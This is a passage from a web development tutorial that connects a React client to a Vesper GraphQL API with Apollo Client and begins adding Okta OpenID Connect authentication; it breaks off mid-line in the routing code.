import { GraphQLDate, GraphQLDateTime, GraphQLTime } from 'graphql-iso-date';

bootstrap({
  ...
  // https://github.com/vesper-framework/vesper/issues/4
  customResolvers: {
    Date: GraphQLDate,
    Time: GraphQLTime,
    DateTime: GraphQLDateTime
  },
  ...
});

Now running the points query will return a more client-friendly result.

{
  "data": {
    "points": [
      {
        "id": 1,
        "date": "2018-06-04",
        "exercise": 1,
        "diet": 1,
        "notes": "Hello World"
      }
    ]
  }
}

You’ve written an API with GraphQL and TypeScript in about 20 minutes. How cool is that?! There’s still work to do though. In the next sections, you’ll create a React client for this API and add authentication with OIDC. Adding authentication will give you the ability to get the user’s information and associate a user with their points.

Get Started with React

One of the quickest ways to get started with React is to use Create React App. Install the latest release using the command below.

npm i -g create-react-app@1.1.4

Navigate to the directory where you created your GraphQL API and create a React client.

cd health-tracker
create-react-app react-client

Install the dependencies you’ll need to integrate Apollo Client with React, as well as Bootstrap and reactstrap.

npm i apollo-boost@0.1.7 react-apollo@2.1.4 graphql-tag@2.9.2 graphql@0.13.2

Configure Apollo Client for Your API

Open react-client/src/App.js, import ApolloClient from apollo-boost, and add the endpoint to your GraphQL API.

import ApolloClient from 'apollo-boost';

const client = new ApolloClient({
  uri: "http://localhost:4000/graphql"
});

That’s it! With only three lines of code, your app is ready to start fetching data. You can prove it by importing the gql function from graphql-tag. This will parse your query string and turn it into a query document.

import gql from 'graphql-tag';

class App extends Component {

  componentDidMount() {
    client.query({
      query: gql`
        {
          points {
            id date exercise diet alcohol notes
          }
        }
      `
    })
    .then(result => console.log(result));
  }
...
}

Make sure to open your browser’s developer tools so you can see the data after making this change. You could modify the console.log() to use this.setState({points: result.data.points}), but then you’d have to initialize the default state in the constructor (a sketch of that approach follows). But there’s an easier way: you can use ApolloProvider and Query components from react-apollo!
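Here is that setState() sketch for reference (illustration only; it reuses the client and gql imports already in App.js, and the tutorial continues with the Query component instead):

class App extends Component {
  constructor(props) {
    super(props);
    // The default state has to be initialized here so setState() has something to update.
    this.state = { points: [] };
  }

  componentDidMount() {
    client.query({
      query: gql`
        {
          points {
            id date exercise diet alcohol notes
          }
        }
      `
    })
    .then(result => this.setState({ points: result.data.points }));
  }

  render() {
    return (
      <div className="App">
        {this.state.points.map(p => (
          <p key={p.id}>{p.date}: {p.exercise + p.diet + p.alcohol} points</p>
        ))}
      </div>
    );
  }
}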

Below is a modified version of react-client/src/App.js that uses the ApolloProvider and Query components.

import React, { Component } from 'react';
import logo from './logo.svg';
import './App.css';
import ApolloClient from 'apollo-boost';
import gql from 'graphql-tag';
import { ApolloProvider, Query } from 'react-apollo';
const client = new ApolloClient({
  uri: "http://localhost:4000/graphql"
});

class App extends Component {

  render() {
    return (
      <ApolloProvider client={client}>
        <div className="App">
          <header className="App-header">
            <img src={logo} className="App-logo" alt="logo" />
            <h1 className="App-title">Welcome to React</h1>
          </header>
          <p className="App-intro">
            To get started, edit <code>src/App.js</code> and save to reload.
          </p>
          <Query query={gql`
            {
              points {id date exercise diet alcohol notes}
            }
          `}>
            {({loading, error, data}) => {
              if (loading) return <p>Loading...</p>;
              if (error) return <p>Error: {error}</p>;
              return data.points.map(p => {
                return <div key={p.id}>
                  <p>Date: {p.date}</p>
                  <p>Points: {p.exercise + p.diet + p.alcohol}</p>
                  <p>Notes: {p.notes}</p>
                </div>
              })
            }}
          </Query>
        </div>
      </ApolloProvider>
    );
  }
}

export default App;

You’ve built a GraphQL API and a React UI that talks to it - excellent work! However, there’s still more to do. In the next sections, I’ll show you how to add authentication to React, verify JWTs with Vesper, and add CRUD functionality to the UI. CRUD functionality already exists in the API thanks to the mutations you wrote earlier.
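For example, the pointsSave mutation you wrote earlier can already be called from the client. A minimal sketch (hypothetical, reusing the ApolloClient instance and the gql import from App.js) looks like this:

client.mutate({
  mutation: gql`
    mutation {
      pointsSave(exercise: 1, diet: 1, alcohol: 0, notes: "Saved from React") {
        id
        date
      }
    }
  `
}).then(result => console.log('Saved points with id', result.data.pointsSave.id));

Adding authentication, covered next, is what will let you associate records like this one with a specific user.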

Add Authentication for React with OpenID Connect

You’ll need to configure React to use Okta for authentication. To do that, create an OIDC app in Okta.

Log in to your Okta Developer account (or sign up if you don’t have an account) and navigate to Applications > Add Application. Click Single-Page App, click Next, and give the app a name you’ll remember. Change all instances of localhost:8080 to localhost:3000 and click Done. Your settings should be similar to the screenshot below.

OIDC App Settings

Okta’s React SDK allows you to integrate OIDC into a React application. To install, run the following command:

npm i @okta/okta-react@1.0.2 react-router-dom@4.2.2

Okta’s React SDK depends on react-router, hence the reason for installing react-router-dom. Configuring routing in react-client/src/App.js is a common practice, so replace its code with the JavaScript below that sets up authentication with Okta.

import React, { Component } from 'react';
import { BrowserRouter as Router, Route } from 'react-router-dom';
import { ImplicitCallback, SecureRoute, Security } from '@okta/okta-react';
import Home from './Home';
import Login from './Login';
import Points from './Points';

function onAuthRequired({history}) {
  history.push('/login');
}

class App extends Component {
  render() {
    return (
      <Router>
        <Security issuer='https://{yourOktaDomain}.com/oauth2/default'
                  client_id='{yourClientId}'
                  redirect_uri={window.location.origin + '/implicit/callback'}
                  onAuthRequired={onAuthRequired}>
          <Route path='/' exact={true} component={Home}/>
          <SecureRoute path='/points' component={Points}/>
          <Route path=